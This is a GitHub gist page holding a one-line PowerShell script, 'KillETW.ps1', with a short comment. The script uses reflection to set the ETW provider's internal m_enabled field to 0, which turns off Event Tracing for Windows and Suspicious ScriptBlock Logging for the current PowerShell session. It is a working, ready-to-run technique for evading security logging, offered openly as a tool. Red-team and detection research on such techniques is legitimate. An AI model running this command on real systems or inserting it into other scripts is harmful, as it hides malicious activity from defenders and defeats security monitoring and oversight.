Skip to content

Instantly share code, notes, and snippets.

@dezhub

dezhub/KillETW.ps1

Forked from tandasat/KillETW.ps1
Created January 25, 2019 15:32
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save dezhub/c7c190e6d3f98cf72c2a60fe191f10a3 to your computer and use it in GitHub Desktop.
Save dezhub/c7c190e6d3f98cf72c2a60fe191f10a3 to your computer and use it in GitHub Desktop.
Download ZIP
Disable ETW of the current PowerShell session
Raw
KillETW.ps1
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment